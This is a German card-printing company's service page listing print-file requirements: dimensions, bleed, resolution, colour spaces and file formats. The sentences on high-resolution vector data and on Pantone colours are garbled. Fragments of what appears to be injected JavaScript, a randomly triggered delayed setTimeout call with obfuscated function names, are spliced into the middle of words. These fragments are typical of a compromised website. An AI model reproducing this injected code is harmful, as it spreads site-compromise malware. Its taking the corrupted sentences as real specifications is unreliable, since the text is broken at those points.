Pro Card Systems GmbH
Ossensteg 13
33184 Altenbeken

0 52 55 / 93 33 -0

service@pro-card-systems.de

Kontaktformular

Preisanfrage

Sie sind hier: Startseite » Service » Druckvorlage

Druckvorlage


Eine gute Kommunikation hinsichtlich der anzuliefernden Druckvorlagen ist wichtig. Besprechen Sie mit uns die Bereitstellung Ihrer Druckvorlagen. Um Ihren Auftrag ohne Zeitverlust abzuwickeln, müssen alle Fragen zu Ihren Daten geklärt sein.

 

Welches ist die richtige Dateigröße?

Das Format 88,60 mm x 57,00 mm ist die Grundlage für Ihre Druckdatei. Hier ist ein umlaufender Beschnitt von 1,50 mm berücksichtigt. Das am Ende entstehende Kartenformat von 85,60 mm x 54,00 mm wird hier mittig herausgestanzt. Logos, Texte oder andere wichtige Elemente müssen innerhalb des Satzspiegels 81,6 mm x 50 mm gesetzt werden.

 

Welche Auflösung der Datei ist erforderlich?

Um ein Druckergebnis von brillianter und scharfer Qualität zu erreichen, sollten Ihre Druckdaten eine Auflösung von 300 dpi besitzen. Bei der Verwendung von filligranen Grafiken oder Texten, ist eine Auflösung von 600 dpi bzw. von Vekdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tordaten ratsam.

 

Welcher Farbraum bzw. welche Farben können verwendet werden?

Es kann in Skalenfarben, Sonderfarben oder im Digitaldruck Verfahren gedruckt werden. Für den Druck mit Skalenfarben müssen die Daten im CMYK Farbraum angelegt sein. Sonderfarben können als Pandom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tone oder HKS Farbe gedruckt werden. Eine eindeutige Bezeichnung mit dem vollständigen Farbnamen ist hier erforderlich. (Bsp. HKS 25 K).

 

Wie muss ich meine Druckdaten übermitteln?

Bitte beachten Sie, dass wir Formate als druckfähiges PDF bevorzugen. Auch die Formate JPEG, TIF oder EPS sind für die Übermittlung Ihrer Daten möglich.